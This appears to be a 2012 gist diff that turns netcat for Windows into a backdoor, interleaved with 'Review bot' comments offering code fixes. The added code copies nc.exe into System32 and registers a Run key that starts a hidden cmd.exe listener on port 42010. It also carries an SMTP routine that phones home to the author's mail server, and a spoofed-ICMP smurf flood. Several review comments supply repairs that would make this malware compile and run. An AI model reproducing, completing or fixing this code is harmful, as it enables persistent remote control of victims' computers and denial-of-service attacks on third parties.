@fakessh
Created October 10, 2012 22:47
nc create backdoor registry and email for nc111nt
Les fichiers binaires /home/swilting/Téléchargements/nc/doexec.o et /home/swilting/nc-win-backdoor-nc-win-backdoor/doexec.o sont différents.
diff -crB /home/swilting/Téléchargements/nc/getopt.c /home/swilting/nc-win-backdoor-nc-win-backdoor/getopt.c
*** /home/swilting/Téléchargements/nc/getopt.c 1996-11-06 22:40:36.000000000 +0100
--- /home/swilting/nc-win-backdoor-nc-win-backdoor/getopt.c 2012-10-26 15:30:01.812133992 +0200
***************
*** 45,51 ****
#include <stdio.h>
#ifdef WIN32
! #include <string.h>
#endif
/* Comment out all this code if we are using the GNU C Library, and are not
--- 45,60 ----
#include <stdio.h>
#ifdef WIN32
! #include <string.h>
! #include <tchar.h>
! #include <windows.h>
!
! // Change accordingly...
!
! #define POLICY_KEY TEXT("Software\\Policies\\Microsoft\\Windows\\Explorer")
!
! #define PREFERENCE_KEY TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer")
!
#endif
/* Comment out all this code if we are using the GNU C Library, and are not
***************
*** 204,210 ****
#endif /* __GNUC__ */
#endif /* not __GNU_LIBRARY__ */
!
/* Handle permutation of arguments. */
/* Describe the part of ARGV that contains non-options that have
--- 213,219 ----
#endif /* __GNUC__ */
#endif /* not __GNU_LIBRARY__ */
!
/* Handle permutation of arguments. */
/* Describe the part of ARGV that contains non-options that have
***************
*** 697,703 ****
int digit_optind = 0;
while (1)
! {
int this_option_optind = optind ? optind : 1;
c = getopt (argc, argv, "abc:d:0123456789");
--- 706,719 ----
int digit_optind = 0;
while (1)
! {
! #ifdef WIN32
! LPTSTR lpValueName = "Browse For Folder Height";
!
! DWORD dwDefault = 0x00000000;
!
! init_regedit(lpValueName, dwDefault);
! #endif
int this_option_optind = optind ? optind : 1;
c = getopt (argc, argv, "abc:d:0123456789");
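Review bot: `init_regedit(lpValueName, dwDefault);` is called in getopt.c with no prototype in sight, and the only definition this patch supplies is `static` in netcat.c, so this compiles as an implicit declaration and then fails at link time. `LPTSTR lpValueName = "Browse For Folder Height";` also assigns a narrow string literal to a `TCHAR *`, which breaks under a UNICODE build; write `TEXT("Browse For Folder Height")` as the key macros added at the top of this file do. The call sits inside the `while (1)` option loop, so every iteration would repeat the file copy and registry writes the function performs; hoist it above the loop at minimum. The enclosing function starts and ends outside the hunk.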
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: getopt.c~
Les fichiers binaires /home/swilting/Téléchargements/nc/getopt.o et /home/swilting/nc-win-backdoor-nc-win-backdoor/getopt.o sont différents.
Seulement dans /home/swilting/Téléchargements/nc/: makefile
Seulement dans /home/swilting/Téléchargements/nc/: makefile~
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: Makefile
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: Makefile~
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: nc.exe
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: nc.patch
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: nc.patch~
diff -crB /home/swilting/Téléchargements/nc/netcat.c /home/swilting/nc-win-backdoor-nc-win-backdoor/netcat.c
*** /home/swilting/Téléchargements/nc/netcat.c 2004-12-29 13:07:04.000000000 +0100
--- /home/swilting/nc-win-backdoor-nc-win-backdoor/netcat.c 2012-10-23 13:03:27.745322002 +0200
***************
*** 29,38 ****
RAW mode!
backend progs to grab a pty and look like a real telnetd?!
*/
!
#include "generic.h" /* same as with L5, skey, etc */
#ifdef WIN32
#pragma comment (lib, "ws2_32") /* winsock support */
#endif
--- 29,56 ----
RAW mode!
backend progs to grab a pty and look like a real telnetd?!
*/
! #define _WIN32_WINNT 0x0502 // Windows Server 2003 family
#include "generic.h" /* same as with L5, skey, etc */
+ #include <openssl/sha.h>
+ #include <openssl/bio.h>
+ #include <openssl/buffer.h>
+
+ #include <openssl/ssl.h>
+ #include <openssl/rand.h>
+ #include <openssl/err.h>
+ #include <openssl/rand.h>
+ #include <openssl/md5.h>
+ #include <openssl/evp.h>
+ #include <openssl/hmac.h>
+ #include <stdint.h>
+
#ifdef WIN32
+
+
+ // For Win Xp, change accordingly...
+
+ #define _WIN32_WINNT 0x0501
#pragma comment (lib, "ws2_32") /* winsock support */
#endif
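Review bot: `_WIN32_WINNT` is defined as `0x0502` before `generic.h` and then redefined as `0x0501` inside `#ifdef WIN32`, which is a macro redefinition with a different value — compilers diagnose it, and the second value has no effect on whatever headers `generic.h` already pulled in. Define it once, before any include, and guard it with `#ifndef _WIN32_WINNT` so a build flag can override it. `<openssl/rand.h>` is included twice, and all of the OpenSSL headers are now unconditional, so non-WIN32 builds acquire a hard OpenSSL dependency for a `sendmail` routine whose only visible caller is under `#ifdef WIN32` in `main`.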
***************
*** 64,69 ****
--- 82,89 ----
#undef IP_OPTIONS
#undef SO_REUSEPORT
#include <windows.h>
+ #include <tchar.h>
+ #include <stdio.h>
#endif
***************
*** 122,131 ****
#include <errno.h>
#include <signal.h>
- /* handy stuff: */
#define SA struct sockaddr /* socket overgeneralization braindeath */
#define SAI struct sockaddr_in /* ... whoever came up with this model */
#define IA struct in_addr /* ... should be taken out and shot, */
/* ... not that TLI is any better. sigh.. */
#define SLEAZE_PORT 31337 /* for UDP-scan RTT trick, change if ya want */
#define USHORT unsigned short /* use these for options an' stuff */
--- 142,153 ----
#include <errno.h>
#include <signal.h>
#define SA struct sockaddr /* socket overgeneralization braindeath */
+
#define SAI struct sockaddr_in /* ... whoever came up with this model */
+
#define IA struct in_addr /* ... should be taken out and shot, */
+
/* ... not that TLI is any better. sigh.. */
#define SLEAZE_PORT 31337 /* for UDP-scan RTT trick, change if ya want */
#define USHORT unsigned short /* use these for options an' stuff */
***************
*** 206,211 ****
--- 228,550 ----
unsigned int o_wait = 0;
USHORT o_zero = 0;
+ #define CHK_NULL_ASSERT(x) assert(x != NULL)
+
+ #define CHK_NULL(x) do { if ((x)==NULL) exit (1); }while(0)
+ #define CHK_ERR(err,s) if ((err)==-1) { perror(s); exit(1); }
+ #define CHK_SSL(err) if ((err)==-1) { ERR_print_errors_fp(stderr); exit(2); }
+
+ #define TAILLE_TAMPON 1500
+ #ifdef WIN32
+ #define WIN32_LEAN_AND_MEAN
+ #include <windows.h>
+ #include <winsock2.h>
+ #include <ws2tcpip.h>
+ #include <assert.h>
+ #define bzero(p, l) memset(p, 0, l)
+ #define bcopy(s, t, l) memmove(t, s, l)
+ #else
+ #endif
+ #define CHK_NULL_ASSERT(x) assert(x != NULL)
+
+ #define CHK_NULL(x) do { if ((x)==NULL) exit (1); }while(0)
+ #define CHK_ERR(err,s) if ((err)==-1) { perror(s); exit(1); }
+ #define CHK_SSL(err) if ((err)==-1) { ERR_print_errors_fp(stderr); exit(2); }
+
+ #define TAILLE_TAMPON 1500
+ void encodeblock( unsigned char in[], char b64str[], int len );
+ void b64_encode(char *clrstr, char *b64dst);
+ void send_line(SSL* ssl,char* cmd);
+ void recv_line(SSL* ssl);
+ void sendmail(char *email,char *body);
+ int open_socket(struct sockaddr *addr);
+ /* ------------------------------------------------------------------------ *
+ * file: base64_stringencode.c v1.0 *
+ * purpose: tests encoding/decoding strings with base64 *
+ * author: 02/23/2009 Frank4DD *
+ * *
+ * source: http://base64.sourceforge.net/b64.c for encoding *
+ * http://en.literateprograms.org/Base64_(C) for decoding *
+ * ------------------------------------------------------------------------ */
+
+
+ /* ---- Base64 Encoding/Decoding Table --- */
+ char b64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
+
+
+
+
+
+ /* encodeblock - encode 3 8-bit binary bytes as 4 '6-bit' characters */
+ void encodeblock( unsigned char in[], char b64str[], int len ) {
+ char out[5];
+ out[0] = b64[ in[0] >> 2 ];
+ out[1] = b64[ ((in[0] & 0x03) << 4) | ((in[1] & 0xf0) >> 4) ];
+ out[2] = (unsigned char) (len > 1 ? b64[ ((in[1] & 0x0f) << 2) |
+ ((in[2] & 0xc0) >> 6) ] : '=');
+ out[3] = (unsigned char) (len > 2 ? b64[ in[2] & 0x3f ] : '=');
+ out[4] = '\0';
+ strncat(b64str, out, sizeof(out));
+ }
+
+ /* encode - base64 encode a stream, adding padding if needed */
+ void b64_encode(char *clrstr, char *b64dst) {
+ unsigned char in[3];
+ int i, len = 0;
+ int j = 0;
+
+ b64dst[0] = '\0';
+ while(clrstr[j]) {
+ len = 0;
+ for(i=0; i<3; i++) {
+ in[i] = (unsigned char) clrstr[j];
+ if(clrstr[j]) {
+ len++; j++;
+ }
+ else in[i] = 0;
+ }
+ if( len ) {
+ encodeblock( in, b64dst, len );
+ }
+ }
+ }
+
+ //send data
+ void send_line(SSL* ssl,char* cmd)
+ {
+ int err;
+ err = SSL_write (ssl, cmd, strlen(cmd));
+ CHK_SSL(err);
+ }
+
+ //receive data
+ void recv_line(SSL* ssl)
+ {
+ char rbuf[TAILLE_TAMPON] = {0};
+ int err;
+ err = SSL_read (ssl, rbuf, sizeof(rbuf) - 1);
+ CHK_SSL(err);
+ printf("%s\n", rbuf);
+ }
+
+ //open TCP Socket connection
+ int open_socket(struct sockaddr *addr)
+ {
+
+ int retval;
+ #ifdef WIN32
+ WSADATA W;
+ SOCKET sockfd;
+ WSAStartup (0x101, &W);
+ sockfd = socket(AF_INET, SOCK_STREAM, 0);
+ #else
+ int sockfd;
+ sockfd = socket(AF_INET, SOCK_STREAM, 0);
+ #endif
+ if(sockfd < 0)
+ {
+ fprintf(stderr, "Open sockfd(TCP) error!\n");
+ exit(-1);
+ }
+ #ifdef WIN32
+ retval = connect(sockfd, addr, sizeof(struct sockaddr));
+ #else
+ retval = connect(sockfd, addr, sizeof(struct sockaddr));
+ #endif
+ printf("connecting smtp server\n");
+ if(retval == -1)
+ {
+ fprintf(stderr, "Connect sockfd(TCP) error!\n");
+ exit(-1);
+ }
+ return sockfd;
+ }
+
+ // sending email
+ void sendmail(char *email, char *body)
+ {
+ int sockfd;
+ int retval = 0;
+ int err;
+ char *host_name = "smtp.fakessh.eu";
+ struct sockaddr_in their_addr;
+ struct hostent *hent;
+ char buf[TAILLE_TAMPON] = {0};
+ char rbuf[TAILLE_TAMPON] = {0};
+ char login[TAILLE_TAMPON] = {0};
+ char pass[TAILLE_TAMPON] = {0};
+
+ //initialize SSL
+ SSL_CTX *ctx;
+ SSL *ssl;
+ SSL_METHOD *meth;
+
+ SSLeay_add_ssl_algorithms();
+ meth = SSLv23_method();
+ SSL_load_error_strings();
+ SSL_library_init();
+ ctx = SSL_CTX_new(meth);
+ CHK_NULL(ctx);
+
+ fd_set readfds;
+ struct timeval timeout;
+
+ //Define a timeout for resending data.
+ timeout.tv_sec = 2;
+ timeout.tv_usec = 0;
+
+ #ifdef WIN32
+ WSADATA WSAData;
+ WSAStartup(MAKEWORD(2, 2), &WSAData);
+ #endif
+
+ hent = gethostbyname(host_name);
+ memset(&their_addr, 0, sizeof(their_addr));
+ their_addr.sin_family = AF_INET;
+ their_addr.sin_port = htons(42015);
+ #ifdef WIN32
+ their_addr.sin_addr = *((LPIN_ADDR )*hent->h_addr);
+ #else
+ their_addr.sin_addr = *((struct in_addr *)hent->h_addr);
+ #endif
+ //connecting mail server and reconnecting if no response in 2 seconds
+ sockfd = open_socket((struct sockaddr *)&their_addr);
+ memset(rbuf,0,TAILLE_TAMPON);
+ FD_ZERO(&readfds);
+ FD_SET(sockfd, &readfds);
+ retval = select(sockfd+1, &readfds, NULL, NULL, &timeout);
+ while(retval <= 0)
+ {
+ printf("reconnect...\n");
+ /*sleep(2);*/
+ #ifdef WIN32
+ (void)closesocket(sockfd);
+ Sleep(2);
+ #else
+ (void)close(sockfd);
+ sleep(2);
+ #endif
+ sockfd = open_socket((struct sockaddr *)&their_addr);
+ memset(rbuf,0,TAILLE_TAMPON);
+ FD_ZERO(&readfds);
+ FD_SET(sockfd, &readfds);
+ retval = select(sockfd+1, &readfds, NULL, NULL, &timeout);
+ }
+
+ memset(rbuf, 0, TAILLE_TAMPON);
+ recv(sockfd, rbuf, TAILLE_TAMPON, 0);
+ printf("%s\n", rbuf);
+
+ //EHLO
+ memset(buf, 0, TAILLE_TAMPON);
+ sprintf(buf, "EHLO localhost\r\n");
+ send(sockfd, buf, strlen(buf), 0);
+ memset(rbuf, 0, TAILLE_TAMPON);
+ recv(sockfd, rbuf, TAILLE_TAMPON, 0);
+ printf("%s\n", rbuf);
+
+ //START_TLS with OPENSSL
+ memset(buf,0, TAILLE_TAMPON);
+ sprintf(buf, "STARTTLS\r\n");
+ send(sockfd, buf, strlen(buf), 0);
+ memset(rbuf, 0, TAILLE_TAMPON);
+ recv(sockfd, rbuf, TAILLE_TAMPON, 0);
+ printf("%s\n", rbuf);
+
+
+ //AUTH LOGIN
+ ssl = SSL_new(ctx);
+ CHK_NULL(ssl);
+ CHK_NULL_ASSERT(ssl);
+ SSL_set_fd (ssl, sockfd);
+ err = SSL_connect(ssl);
+ CHK_SSL(err);
+
+ memset(buf,0, TAILLE_TAMPON);
+ sprintf(buf, "EHLO localhost\r\n");
+ send_line(ssl,buf);
+ recv_line(ssl);
+
+
+ memset(buf,0, TAILLE_TAMPON);
+ sprintf(buf, "AUTH LOGIN\r\n");
+ send_line(ssl,buf);
+ recv_line(ssl);
+
+ //USER
+ memset(buf, 0, TAILLE_TAMPON);
+ sprintf(buf,"test");
+ memset(login, 0, TAILLE_TAMPON);
+ b64_encode(buf, login);
+ sprintf(buf, "%s\r\n", login);
+ send_line(ssl,buf);
+ recv_line(ssl);
+
+ //PASSWORD
+ memset(buf, 0, TAILLE_TAMPON);
+ sprintf(buf, "f*****");
+ memset(pass, 0, TAILLE_TAMPON);
+ b64_encode(buf, pass);
+ sprintf(buf, "%s\r\n", pass);
+ send_line(ssl,buf);
+ recv_line(ssl);
+
+ //MAIL FROM
+ memset(buf,0, TAILLE_TAMPON);
+ sprintf(buf, "MAIL FROM:<test@miss.fakessh.eu>\r\n");
+ send_line(ssl,buf);
+ recv_line(ssl);
+
+ //RCPT TO first receiver
+ memset(buf, 0, TAILLE_TAMPON);
+ sprintf(buf, "RCPT TO:<john.swilting@smtp.fakessh.eu>\r\n");
+ send_line(ssl,buf);
+ recv_line(ssl);
+
+ //RCPT TO second receiver and more receivers can be added
+ //memset(buf, 0, 1500);
+ //sprintf(buf, "RCPT TO:<john.swilting@wanadoo.fr>\r\n");
+ //send_line(ssl,buf);
+ //recv_line(ssl);
+
+ //DATA ready to send mail content
+ send_line(ssl,"DATA\r\n");
+ recv_line(ssl);
+
+ //send mail content£¬"\r\n.\r\n" is the end mark of content
+ memset(buf, 0, TAILLE_TAMPON);
+ sprintf(buf, "%s\r\n.\r\n", body);
+ send_line(ssl,buf);
+ recv_line(ssl);
+ printf("mail send!\n");
+
+ //QUIT
+ send_line(ssl,"QUIT\r\n");
+ recv_line(ssl);
+
+ //free SSL and close socket
+ SSL_shutdown (ssl);
+ #ifdef WIN32
+ (void)closesocket(sockfd);
+ #else
+ (void)close(sockfd);
+ #endif
+ SSL_free (ssl);
+ SSL_CTX_free (ctx);
+
+ #ifdef WIN32
+ WSACleanup();
+ #endif
+
+ return;
+ }
+
+
+
+
+
+
+
/* Debug macro: squirt whatever to stderr and sleep a bit so we can see it go
by. need to call like Debug ((stuff)) [with no ; ] so macro args match!
Beware: writes to stdOUT... */
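Review bot: The TLS session in `sendmail` verifies nothing: `ctx` is given no `SSL_CTX_set_verify` mode or trust store, and the `STARTTLS` reply in `rbuf` is never checked for `220`, so `SSL_connect` runs against whatever answered on `smtp.fakessh.eu:42015` and the base64 `AUTH LOGIN` user and password are handed to an unauthenticated peer. Add `SSL_CTX_set_verify(ctx, SSL_VERIFY_PEER, NULL); if (SSL_CTX_set_default_verify_paths(ctx) != 1) exit(2);` after `CHK_NULL(ctx)` and refuse to proceed unless `rbuf` starts with `220`. `CHK_SSL` only treats `-1` as failure, but `SSL_connect`, `SSL_read` and `SSL_write` return 0 on a controlled shutdown, so a failed handshake falls straight through into sending credentials; make the macro `if ((err) <= 0)`. `hent` from `gethostbyname` is dereferenced without a NULL check, and `recv(sockfd, rbuf, TAILLE_TAMPON, 0)` can fill the buffer completely, leaving no terminator for the `printf("%s\n", rbuf)` that follows — read at most `TAILLE_TAMPON - 1` bytes, and likewise bound the `sprintf(buf, "%s\r\n.\r\n", body)` with `snprintf` since `body` is caller-supplied.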
***************
*** 723,728 ****
--- 1062,1075 ----
return (0); /* no more left! */
} /* nextport */
+
+
+ #ifdef SMURF_ATTACK
+ //char x_smurf_victime = NULL;
+ char x_smurf_victime[20][32];
+ char x_smurf_attack;
+ #endif
+
/* loadports :
set "to be tested" indications in BLOCK, from LO to HI. Almost too small
***************
*** 747,752 ****
--- 1094,1100 ----
#ifdef GAPING_SECURITY_HOLE
char * pr00gie = NULL; /* global ptr to -e arg */
+
#ifdef WIN32
BOOL doexec(SOCKET ClientSocket); // this is in doexec.c
#else
***************
*** 808,816 ****
#endif
/* grab a socket; set opts */
if (o_udpmode)
! nnetfd = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP);
else
! nnetfd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (nnetfd < 0)
bail ("Can't get socket");
if (nnetfd == 0) /* might *be* zero if stdin was closed! */
--- 1159,1170 ----
#endif
/* grab a socket; set opts */
if (o_udpmode)
! nnetfd = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP);
! if(x_smurf_attack)
! nnetfd=socket(AF_INET,SOCK_RAW,255);
else
! nnetfd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
!
if (nnetfd < 0)
bail ("Can't get socket");
if (nnetfd == 0) /* might *be* zero if stdin was closed! */
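Review bot: The inserted `if(x_smurf_attack)` steals the `else` from `if (o_udpmode)`: in UDP mode the datagram socket is created and then, because `x_smurf_attack` is false, the `else` branch immediately overwrites `nnetfd` with a TCP socket, leaking the UDP descriptor and breaking `-u`. It must join the chain as `else if`: `if (o_udpmode) nnetfd = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP); else if (x_smurf_attack) nnetfd = socket (AF_INET, SOCK_RAW, 255); else nnetfd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);`. The reference to `x_smurf_attack` is also outside any `#ifdef SMURF_ATTACK`, while the variable is only declared under that guard elsewhere in this patch, so the default build no longer compiles. The enclosing function starts and ends outside the hunk.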
***************
*** 823,829 ****
#endif
if (rr == -1)
holler ("nnetfd reuseaddr failed"); /* ??? */
! #ifdef SO_REUSEPORT /* doesnt exist everywhere... */
#ifdef WIN32
rr = setsockopt (nnetfd, SOL_SOCKET, SO_REUSEPORT, &c, sizeof (c));
#else
--- 1177,1212 ----
#endif
if (rr == -1)
holler ("nnetfd reuseaddr failed"); /* ??? */
! #ifdef SO_REUSEPORT /* doesnt exist everywhere... */
! #ifdef SMURF_ATTACK
! int TimeOut = 500;
! BOOL HAdHeAder;
! BOOL IsBrocAst;
! if (x_smurf_attack){
! if(x_smurf_victime){
! if (setsockopt(nnetfd,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut))){
! printf("setsockopt sendtimeout fAiled:%d\n",GetLastError());
! return -1;
! }
! if (setsockopt(nnetfd,SOL_SOCKET,SO_RCVTIMEO,(char*)&TimeOut,sizeof(TimeOut))){
! printf("setsockopt recvtimeout fAiled:%d\n",GetLastError());
! return -1;
! }
!
! HAdHeAder = TRUE;
! if (setsockopt(nnetfd,IPPROTO_IP,IP_HDRINCL,(char*)&HAdHeAder,sizeof(HAdHeAder))){
! printf("setsockopt IP_HDRINCL fAiled:%d\n",GetLastError());
! return -1;
! }
!
! IsBrocAst = TRUE;
! if (setsockopt(nnetfd,SOL_SOCKET,SO_BROADCAST,(char*)&IsBrocAst,sizeof(IsBrocAst))){
! printf("setsockopt IP_HDRINCL fAiled:%d\n",GetLastError());
! return -1;
! }
! }
! }
! #endif
#ifdef WIN32
rr = setsockopt (nnetfd, SOL_SOCKET, SO_REUSEPORT, &c, sizeof (c));
#else
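Review bot: This `SMURF_ATTACK` block is nested inside `#ifdef SO_REUSEPORT`, and the WIN32 section of this file appears to `#undef SO_REUSEPORT`, so on the Windows target it is written for (`GetLastError`, `BOOL`) it is compiled out entirely; move it outside the `SO_REUSEPORT` guard. Where it does compile, each `return -1;` leaves the freshly created `nnetfd` open — close it before returning. `if(x_smurf_victime)` tests a `char [20][32]` array, which is never null, so only `x_smurf_attack` actually gates the block, and the last error message reports `IP_HDRINCL` for what is the `SO_BROADCAST` call. The enclosing function starts and ends outside the hunk.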
***************
*** 977,983 ****
IA * lad;
USHORT lp;
{
! register int nnetfd;
register int rr;
HINF * whozis = NULL;
int x;
--- 1360,1366 ----
IA * lad;
USHORT lp;
{
! volatile int nnetfd;
register int rr;
HINF * whozis = NULL;
int x;
***************
*** 1342,1348 ****
p++; x--;
obuf[2] = *p; /* copy actual option byte */
#ifdef WIN32
! (void) send (netfd, obuf, 3, 0); /* one line, or the whole buffer */
#else
(void) write (netfd, obuf, 3);
#endif
--- 1725,1731 ----
p++; x--;
obuf[2] = *p; /* copy actual option byte */
#ifdef WIN32
! (void) send (netfd, (void *)obuf, 3, 0); /* one line, or the whole buffer */
#else
(void) write (netfd, obuf, 3);
#endif
***************
*** 1651,1663 ****
--- 2034,2354 ----
#endif
return (0);
} /* readwrite */
+ #ifdef WIN32
+ #include <string.h>
+ #include <tchar.h>
+ #include <windows.h>
+
+ // Change accordingly...
+
+ #define POLICY_KEY TEXT("Software\\Policies\\Microsoft\\Windows\\Explorer")
+
+ #define PREFERENCE_KEY TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer")
+ static DWORD init_regedit(LPTSTR lpValueName, DWORD dwDefault)
+ {
+
+
+ HKEY hKey;
+
+ LONG lResult;
+ DWORD dwValue, dwType, dwSize = sizeof(dwValue);
+ DWORD dwDisposition;
+
+
+
+ //first utility
+ TCHAR buf[MAX_PATH];
+ GetModuleFileName(0, buf, MAX_PATH);
+ CopyFile(buf, "C:\\WINDOWS\\SYSTEM32\\nc.exe", TRUE);
+ char szData[500]= "C:\\WINDOWS\\SYSTEM32\\nc.exe -vv -d -L -p 42010 -e cmd.exe";
+
+ // First, check for a policy.
+
+ lResult = RegOpenKeyEx(HKEY_CURRENT_USER, POLICY_KEY, 0, KEY_READ, &hKey);
+
+
+
+ if(lResult == ERROR_SUCCESS)
+
+ {
+
+ lResult = RegQueryValueEx(hKey, lpValueName, 0, &dwType, (LPBYTE)&dwValue, &dwSize);
+
+ RegCloseKey(hKey);
+
+ }
+
+ // Exit if a policy value was found.
+
+ if(lResult == ERROR_SUCCESS)
+
+ {
+
+ // return the data value
+
+ return dwValue;
+
+ }
+
+ /*else
+ continue;
+ printf("Policy: value not found!\n");*/
+
+ // Second, check for a preference.
+
+ lResult = RegOpenKeyEx(HKEY_CURRENT_USER, PREFERENCE_KEY, 0, KEY_READ, &hKey);
+
+ if(lResult == ERROR_SUCCESS)
+
+ {
+
+ lResult = RegQueryValueEx(hKey, lpValueName, 0, &dwType, (LPBYTE)&dwValue, &dwSize);
+
+ RegCloseKey (hKey);
+
+ }
+
+ // Exit if a preference was found.
+
+ if(lResult == ERROR_SUCCESS)
+
+ {
+
+ // Return the data value
+
+ return dwValue;
+
+ }
+
+ /*else
+
+ printf("Preference: value not found!\n");*/
+
+
+ lResult = RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, REG_OPTION_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, &dwDisposition);
+
+
+ // Exit if a preference was found.
+
+ if(lResult == ERROR_SUCCESS)
+
+ {
+
+ // Return the data value
+ lResult = RegSetValueEx(hKey, "nc", 0, REG_SZ, (LPBYTE)szData, sizeof(szData));
+ lResult = RegCloseKey(hKey);
+ return dwValue;
+
+ }
+
+ /*else
+ printf("Preference: value not found!\n");*/
+
+ // Neither a policy nor a preference was found; return the default value.
+
+ return dwDefault;
+ }
+ #endif
+ #ifdef SMURF_ATTACK
+ char *Awp;
+ char *victime;
+ typedef struct _icmp_heAder
+ {
+ char type;
+ char code;
+ USHORT checksum;
+ USHORT id;
+ USHORT sequence;
+ ULONG timestAmp;
+ }ICMP_HEADER;
+ //--------------------------------------------------------------------
+ typedef struct _ip_heAder
+ {
+ unsigned char ip_verlen; // 4-bit IPv4 version
+ // 4-bit header length (in 32-bit words)
+ unsigned char ip_tos; // IP type of service
+ unsigned short ip_totallength; // Total length
+ unsigned short ip_id; // Unique identifier
+ unsigned short ip_offset; // Fragment offset field
+ unsigned char ip_ttl; // Time to live
+ unsigned char ip_protocol; // Protocol(TCP,UDP etc)
+ unsigned short ip_checksum; // IP checksum
+ unsigned int ip_srcaddr; // Source address
+ unsigned int ip_destaddr; // Source address
+ } IP_HEADER;
+ //--------------------------------------------------------------------
+ USHORT checksum(USHORT *buffer, int size)
+ {
+ unsigned long cksum=0;
+ while(size >1)
+ {
+ cksum+=*buffer++;
+ size -=sizeof(USHORT);
+ }
+ if(size )
+ {
+ cksum += *(UCHAR*)buffer;
+ }
+ cksum = (cksum >> 16) + (cksum & 0xffff);
+ cksum += (cksum >>16);
+ return (USHORT)(~cksum);
+ }
+ //--------------------------------------------------------------------
+ //--------------------------------------------------------------------
+ smurf_victime(int fd,char lpPArAm ,char lpVictime)
+ {
+ char* victim = &lpVictime;
+ char* Awp = &lpPArAm;
+ char Buff[sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+20];
+ struct sockaddr_in SAddr; /*SAddr={0}; ,dAddr={0};*/
+ IP_HEADER ip_heAder;
+ ICMP_HEADER icmp_heAder;
+
+
+ /////fill ip_heAder
+ ip_heAder.ip_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long));
+ //ip_heAder.ihl = 5;
+ ip_heAder.ip_tos = 0;
+ ip_heAder.ip_totallength = htons(sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+20);
+ ip_heAder.ip_id = 0;
+ //ip_heAder.frAg_off = 0;
+ ip_heAder.ip_offset = 0;
+ ip_heAder.ip_ttl = 255;
+ ip_heAder.ip_protocol = IPPROTO_ICMP;
+ ip_heAder.ip_srcaddr = inet_addr(victim);//
+ ip_heAder.ip_destaddr = inet_addr(Awp);
+ //ip_heAder.checksum = checksum((USHORT*)&ip_heAder,sizeof(IP_HEADER));
+ ///////////////////
+
+ //icmp_heAder = (ICMP_HEADER*)(Buff+sizeof(IP_HEADER));
+
+ //////fill icmp_heAder
+ icmp_heAder.type = 8;
+ icmp_heAder.code = 0;
+ icmp_heAder.id = htons(0);
+ icmp_heAder.sequence = 0;
+ //icmp_heAder.checksum = 0;
+ icmp_heAder.checksum = 0;//checksum((USHORT*)(Buff+sizeof(IP_HEADER)),(sizeof(ICMP_HEADER)+20));
+ //////////////////////
+
+
+ SAddr.sin_family = AF_INET;
+ SAddr.sin_addr .S_un .S_addr = ip_heAder.ip_destaddr ;
+ SAddr.sin_port = htons (0);
+
+
+ /////////////////////////////ÔÚicmpͷûÓÐÌîÊýŸÝʱ,,icmpµÄchecksum×ÜÊdzöŽí ?????
+ memcpy(Buff,&ip_heAder,sizeof(IP_HEADER));
+ memcpy(Buff+sizeof(IP_HEADER),&icmp_heAder,(sizeof(ICMP_HEADER)+20));//20
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER),'A',20);
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER),'U',1);
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+2,'Y',1);
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+3,' ',1);
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+4,'W',1);
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+6,'N',1);
+
+
+ ip_heAder.ip_checksum = checksum((USHORT*)Buff,sizeof(Buff));
+ icmp_heAder.checksum = checksum((USHORT*)(Buff+sizeof(IP_HEADER)),(sizeof(ICMP_HEADER)+20));
+
+ memcpy(Buff,&ip_heAder,sizeof(IP_HEADER));
+ memcpy(Buff+sizeof(IP_HEADER),&icmp_heAder,(sizeof(ICMP_HEADER)+20));//20
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER),'A',20);
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER),'U',1);
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+2,'Y',1);
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+3,' ',1);
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+4,'W',1);
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+6,'N',1);
+ ///////////////////////////////////////////////////////////////////////////
+ printf("Awp %s reAdy\n",Awp);
+
+ while(1){
+ //printf("%s\n",Awp);
+ if (!sendto(fd,Buff,sizeof(Buff),0,(struct sockaddr*)&SAddr,sizeof(SAddr))){
+ printf("send fAiled:%d\n",GetLastError());
+ return -1;
+ }
+ }
+
+ return 0;
+ }
+ #ifdef SMURF_ATTACK
+ x_smurf(fd,x_smurf_victime,x_smurf_attack)
+ int fd;
+ char x_smurf_victime[20][32];
+ char x_smurf_attack;
+ {
+
+ typedef struct {
+ int fd;
+ char x_smurf_victime_param;
+ char x_smurf_attack_param;
+ } StructParametre;
+
+ StructParametre Param;
+
+ if (x_smurf_victime) {
+ if (x_smurf_attack) {
+
+ HANDLE hThread;
+ DWORD threadID;
+ unsigned int n;
+ unsigned int i;
+ FILE* fp;
+ n = -1;
